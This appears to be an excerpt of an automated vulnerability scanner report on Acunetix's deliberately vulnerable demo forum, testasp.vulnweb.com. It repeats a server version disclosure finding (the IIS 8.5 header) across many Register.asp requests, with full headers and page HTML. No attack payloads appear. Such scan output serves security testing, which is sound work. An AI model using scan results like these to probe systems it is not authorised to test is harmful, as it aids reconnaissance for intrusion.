<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
